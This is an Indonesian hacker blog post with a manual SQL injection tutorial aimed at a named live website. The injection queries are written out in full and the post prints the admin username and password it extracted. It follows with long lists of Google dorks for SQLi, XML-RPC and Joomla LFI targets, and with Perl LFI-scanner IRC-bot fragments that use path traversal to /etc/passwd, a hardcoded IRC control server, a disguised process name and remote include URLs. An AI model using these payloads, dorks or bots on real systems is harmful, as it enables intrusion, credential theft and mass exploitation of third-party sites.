Manual SQL Injection Tutorial

Manual SQL Injection Tutorial

By : arianom Kill-9 Crew

Target : http://www.natoleo.com/Content.php?id=14

1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com

http://www.natoleo.com/Content.php?id=14’

muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)

2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')

http://www.natoleo.com/Content.php?id=14 order by 5--

jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)

3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14

http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--

akan muncul "angka ajaib" : 1

4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.

http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--

muncul tulisan :5.0.51a-community

5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--

muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome

6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273

tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--

muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id

kita ambil : member_login,member_password

7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL

ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--

hasilnya akan muncul:

user: wilmarnatoleo

pass: natoleoP@ssword

sekarang tinggal login ke website target..

http://www.natoleo.com/admin/

Say No to Malingsial. Semoga berhasil kawan..

Special BUg SQL Injection

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

Dork XML

!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus"
!xml /nucleus/xmlrpc/server.php "index.php?blogid="
!xml /nucleus/xmlrpc/server.php "The Nucleus Group"
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /xmlrpc.php /amfx
!xml /amfx/xmlrpc.php "BlazeDS"
!xml /amfx/xmlrpc.php "anything"
!xml /xmlrpc.php dev-php/PEAR-XML_RPC
!xml xmlrpc.php "PEAR-XML_RPC"
!xml xmlrpc.php "phpxmlrpc"
!xml xmlrpc.php "/PEAR-XML_RPC"
!xml xmlrpc.php "/pear"
!xml xmlrpc.php "/SRPMS"
!xml xmlrpc.php "/php-pear"
!xml xmlrpc.php "phpMyFAQ"
!xml xmlrpc.php "PHPXMLRPC"
!xml xmlrpc.php "Trustix"
!xml xmlrpc.php "Strayhorn"
!xml /xmlrpc.php /modules.php?op=modload
!xml /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
!xml /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
!xml /xmlrpc.php "XML-RPC library"
!xml /pingserver.php /pMachine+pnSession+pmserver+pm
!xml /pingserver.php /pMachine+pm
!xml /pingserver.php /pMachine+index.php
!xml /pingserver.php /pMachine,pMachine
!xml /xmlrpc.php /include+phpMyFAQ
!xml /xmlrpc.php TikiWiki+utils.php
!xml /xmlrpc.php powered+by+postnuke
!xml /xmlrpc.php "BLOG:CMS"
!xml /xmlrpc.php "faultString XML error: no element found at line 1"
!xml /xmlrpc.php "PEAR XML_RPC"
!xml /xmlrpc.php "Xoops"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlrpc.php "postnuke"
!xml /xmlrpc.php "dailyblog"
!xml /xmlrpc.php phpgroupware
!xml /xmlphp.php "XML-RPC for PHP"
!xml /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /drupal/xmlrpc.php callback
!xml /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /xmlrpc.php "Squirrelcart"
!xml /xmlrpc.php "Powered By Wordpress"
!xml /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
!xml /xmlrpc.php "com_pollxt"
!xml /adxmlrpc.php /phpAdsNew/ site:.it
!xml /xmlrpc.php "action"+"poll_ident"
!xml /xmlrpc.php "webcalendar"
!xml /WordPress WordPress 1.2.1
!xml /b2/xmlsrv/xmlrpc.php /b2+site:.it
!xml /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
!xml /blog/xmlrpc.php /blog+site:.it
!xml /blog/xmlsrv/xmlrpc.php /blog+site:.it
!xml /blogs/xmlrpc.php /blogs+site:.it
!xml /blogs/xmlsrv/xmlrpc.php /blogs+site:.it
!xml /blogtest/xmlsrv/xmlrpc.php /blogtest+site:.it
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /blogs/b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus" site:it
!xml /nucleus/xmlrpc/server.php "index.php?blogid=" site:.it
!xml /nucleus/xmlrpc/server.php "The Nucleus Group" site:.it
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml /faq/xmlrpc.php "/index.php?p=faq"
!xml /faq/xmlrpc.php "/index.php?pg=faq"
!xml /faq/xmlrpc.php "/index.php?pag=faq"
!xml /faq/xmlrpc.php "/index.php?page=faq"
!xml /faq/xmlrpc.php "/?faq"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"

LFI Dork

!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php
!lfi index.php?option=com_beeheard&controller= index.php?option=com_beeheard
!lfi index.php?option=com_arcadegames&controller= option=com_arcadegames
!lfi index.php?option=com_flashgames&controller= "option=com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
!lfi index.php?option=com_advertising&controller= index.php?option=com_advertising
!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
!lfi index.php?option=com_myfiles&controller= index.php?option=com_myfiles
!lfi index.php?option=com_onlineexam&controller= "option=com_onlineexam"
!lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
!lfi /index.php?option=com_memory&controller= "option=com_memory"
!lfi index.php?option=com_market&controller= "?option=com_market"
!lfi index.php?option=com_diary&controller= index.php?option=com_diary
!lfi /index.php?option=com_worldrates&controller= option=com_worldrates
!lfi index.php?option=com_record&controller= index.php?option=com_record
!lfi index.php?option=com_sweetykeeper&controller= index.php?option=com_sweetykeeper
!lfi index.php?option=com_wgpicasa&controller= index.php?option=com_wgpicasa
!lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
!lfi index.php?option=com_photobattle&view= index.php?option=com_photobattle
!lfi index.php?option=com_mtfireeagle&controller= index.php?option=com_mtfireeagle
!lfi index.php?option=com_lovefactory&controller= index.php?option=com_lovefactory
!lfi index.php?option=com_jacomment&view= option=com_jacomment
!lfi index.php?option=com_delicious&controller= index.php?option=com_delicious&controller=
!lfi index.php?option=com_blogfactory&controller= index.php?option=com_blogfactory
!lfi index.php?option=com_sebercart&view= index.php?option=com_sebercart
!lfi index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
!lfi index.php?option=com_jukebox&controller= index.php?option=com_jukebox
!lfi index.php?option=com_joomlaflickr&controller= index.php?option=com_joomlaflickr
!lfi index.php?option=com_hsconfig&controller= index.php?option=com_hsconfig
!lfi index.php?option=com_fabrik&controller= index.php?option=com_fabrik
!lfi index.php?option=com_datafeeds&controller= index.php?option=com_datafeeds
!lfi /index.php?option=com_appointment&controller= /index.php?option=com_appointment
!lfi tools.php?p= powered by Plume CMS
!lfi index.php?option=com_awiki&controller= index.php?option=com_awiki
!lfi index.php?option=com_webeecomment&controller= index.php?option=com_webeecomment
!lfi index.php?option=com_realtyna&controller= index.php?option=com_realtyna
!lfi index.php?option=com_powermail&controller= index.php?option=com_powermail
!lfi /index.php?option=com_foobla_suggestions&controller= option=com_foobla_suggestions
!lfi index.php?option=com_pcchess&controller= index.php?option=com_pcchess
!lfi index.php?option=com_tweetla&controller= index.php?option=com_tweetla
!lfi index.php?option=com_ticketbook&controller= index.php?option=com_ticketbook
!lfi index.php?option=com_jfeedback&controller= index.php?option=com_jfeedback
!lfi index.php?option=com_jprojectmanager&controller= index.php?option=com_jprojectmanager
!lfi index.php?option=com_spsnewsletter&controller= index.php?option=com_spsnewsletter
!lfi index.php?option=com_alphauserpoints&view= ndex.php?option=com_alphauserpoints
!lfi index.php?option=com_travelbook&controller= index.php?option=com_travelbook
!lfi index.php?option=com_webtv&controller= index.php?option=com_webtv
!lfi index.php?option=com_horoscope&controller= index.php?option=com_horoscope
!lfi index.php?option=com_rd_download&view=download&cid= index.php?option=com_rd_download
!lfi /modules/pages/index.php?id= pL-PHP
!lfi index.php?option=com_abbrev&controller= index.php?option=com_abbrev
!lfi /index.php?modname= Docebo
!lfi bbcode_inputs.php?layout= bbcode_inputs.php
!lfi /index.php?p= JaxCMS
!lfi index.php?option=com_otzivi&controller= index.php?option=com_otzivi
!lfi /jsloader.php?files[]= jsloader.php
!lfi file.php?file[]= file.php
!lfi vbseo.php?vbseoembedd=1&vbseourl= vbseo.php
!lfi firstvisit.php?lang_global= firstvisit.php
!lfi /modules/hayoo/index.php?theme= TRIBISUR
!lfi index.php?option=com_juliaportfolio&controller= index.php?option=com_juliaportfolio
!lfi index.php?option=com_sbsfile&controller= index.php?option=com_sbsfile
!lfi index.php?option=com_gcalendar&controller= index.php?option=com_gcalendar
!lfi index.php?option=com_ninjarsssyndicator&controller= index.php?option=com_ninjarsssyndicator
!lfi index.php?option=com_rpx&controller= index.php?option=com_rpx
!lfi index.php?option=com_linkr&controller= index.php?option=com_linkr
!lfi index.php?option=com_janews&controller= option=com_janews
!lfi index.php?option=com_ganalytics&controller= index.php?option=com_ganalytics
!lfi index.php?option=com_sectionex&controller= index.php?option=com_sectionex
!lfi index.php?option=com_rokdownloads&controller= option=com_rokdownloads
!lfi index.php?option=com_rwcards&view=rwcards&controller= index.php?option=com_rwcards
!lfi index.php?option=com_news_portal&controller= index.php?option=com_news_portal
!lfi index.php?option=com_jinventory&controller= index.php?option=com_jinventory
!lfi index.php?option=com_wisroyq&controller= index.php?option=com_wisroyq
!lfi /index.php?option=com_redtwitter&view= /index.php?option=com_redtwitter
!lfi index.php?option=com_redshop&view= index.php?option=com_redshop
!lfi upload.php?language= upload.php?language=
!lfi index.php?option=com_weberpcustomer&controller= index.php?option=com_weberpcustomer
!lfi /index.php?option=com_userstatus&controller= option=com_userstatus
!lfi index.php?option=com_jvehicles&controller= index.php?option=com_jvehicles
!lfi index.php?option=com_econtent&controller= index.php?option=com_econtent
!lfi alpha.php?Absolute_Path= alpha.php?Absolute_Path=
!lfi payment.php?page_id= payment.php
!lfi index.php?option=com_dwgraphs&controller= index.php?option=com_dwgraphs
!lfi index.php?w= Pepsi CMS
!lfi index.php?action= index.php?action=
!lfi graph.php?go= "graph.php?go="
!lfi index.php?pg= "index.php?pg="
!lfi index.php?option=com_smestorage&controller= index.php?option=com_smestorage
!lfi index.php?option=com_properties&controller= index.php?option=com_properties
!lfi index.php?option=com_jeformcr&view= index.php?option=com_jeformcr

Joomla LFI dork

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller= "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller= "com_perchafieldsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"

LFi Scanner v1.0

#!/usr/bin/perl

#######################################
# Apache Conf Scanner v1.0            #
# ReCoded by arianom                   #
# d00r[at]telkom[dot]net              #
# Copyleft © 2009 VopCrew UnderGrounD #
#######################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;

my $fakeproc  = $ARGV[6];
$ircserver    = $ARGV[0] unless $ircserver;
my $ircport   = $ARGV[1];
my $nickname  = $ARGV[2];
my $ident     = $ARGV[3];
my $channel   = '#'.$ARGV[4];
my $runner    = $ARGV[5];
my $fullname  = ' 15( 7@ 2Apache-Conf-Scanner 15) ';

my $lficmd    = '!conf';
my $alicmd    = '!logz';

my $status      = 0;
my $null_byte   = "";
my $trasversal  = "../../../../../../../../../../../../../../../..";
my $lfi_test    = "/etc/passwd";
my $lfi_output  = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
my $conf_output = "server configuration file";
my @httpd_conf  = qw (
   /etc/httpd/conf/httpd.conf
   /usr/local/apache/conf/httpd.conf
   /usr/local/etc/apache/httpd.conf
   /usr/local/etc/httpd/httpd.conf
   /etc/apache/conf/httpd.conf
   /etc/apache2/conf/httpd.conf
   /var/www/conf/httpd.conf
   /usr/local/httpd/conf/httpd.conf
   );

Download Link
NB:Cara Menggunakan gampang, ketik aja perl conf-scan.txt
nanti muncul pesan cara menggunakan yang benar di Kolom Shell
Selamat Mencoba!!

e107 New Scanner ByroeNet

#!/usr/bin/perl
$powered="ByroeNet";
$mail="admin(at)byroe.net";
#######################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.kill-9.server.or.id";
my $ircport = "6667";
my $nickname = "loveYou";
my $ident = "love";
my $channel = "#kill-9";
my $runner = "arianom";
my $fullname = 'matamu suwek';
my $lfi = "!lfi";
my $xml = "!xml";
my $e107 = "!e107";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt?";
my $byroesprd = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/pbot.txt?";

Download [lengkap +id]

BaMbY LFI Scanner

#!/usr/bin/perl
$powered="BaMbY";
